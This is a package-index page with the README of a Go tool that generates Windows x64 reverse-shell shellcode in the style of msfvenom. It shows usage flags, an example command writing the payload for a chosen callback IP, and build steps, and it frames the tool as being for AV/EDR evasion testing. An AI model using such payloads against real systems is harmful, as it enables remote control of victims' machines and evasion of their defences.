https://github.com/nchgroup/shell_reverse_tcp
msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies
https://github.com/nchgroup/shell_reverse_tcp
backdoor go golang malware metasploit msfvenom payload reverse reverse-shell shellcode
Last synced: 5 months ago
JSON representation
msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies
- Host: GitHub
- URL: https://github.com/nchgroup/shell_reverse_tcp
- Owner: nchgroup
- License: mit
- Created: 2025-01-03T21:58:15.000Z (11 months ago)
- Default Branch: main
- Last Pushed: 2025-07-09T18:04:35.000Z (5 months ago)
- Last Synced: 2025-07-10T03:29:04.979Z (5 months ago)
- Topics: backdoor, go, golang, malware, metasploit, msfvenom, payload, reverse, reverse-shell, shellcode
- Language: Go
- Homepage:
- Size: 7.81 KB
- Stars: 2
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# shell_reverse_tcp
msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies
# Help
```
$ ./shell_reverse_tcp -h
Usage of ./shell_reverse_tcp:
-f string
Formats: {raw, hex, base64, c, python, rust, csharp, psh, vba} (default "raw")
-l string
LHOST IP address (default "127.0.0.1")
-p int
Port number (0-65535) (default 4444)
```
## Example
```
$ ./shell_reverse_tcp -l 192.168.1.2 -p 4444 -f raw > shellcode.bin
```
# Build
```bash
git clone https://github.com/nchgroup/shell_reverse_tcp
cd shell_reverse_tcp/
go build .
```
# Project spirit
Generate your payload in x64 quickly and easily without dependencies to perform AV/EDR evasion tests on Windows in amd64, so you can use encoders, ciphers, obfuscators, whatever.
# References
* https://vay3t.medium.com/malware-development-generando-shellcodes-de-metasploit-sin-metasploit-aa120ffcdd92
* https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/windows/x64/shell_bind_tcp.rb#L47
* https://github.com/vay3t/asm-shell_reverse_tcp
# Authors
* [Huerfano](https://www.linkedin.com/in/leonardo-astorga-20b1095a/)
* [Vay3t](https://vay3t.org)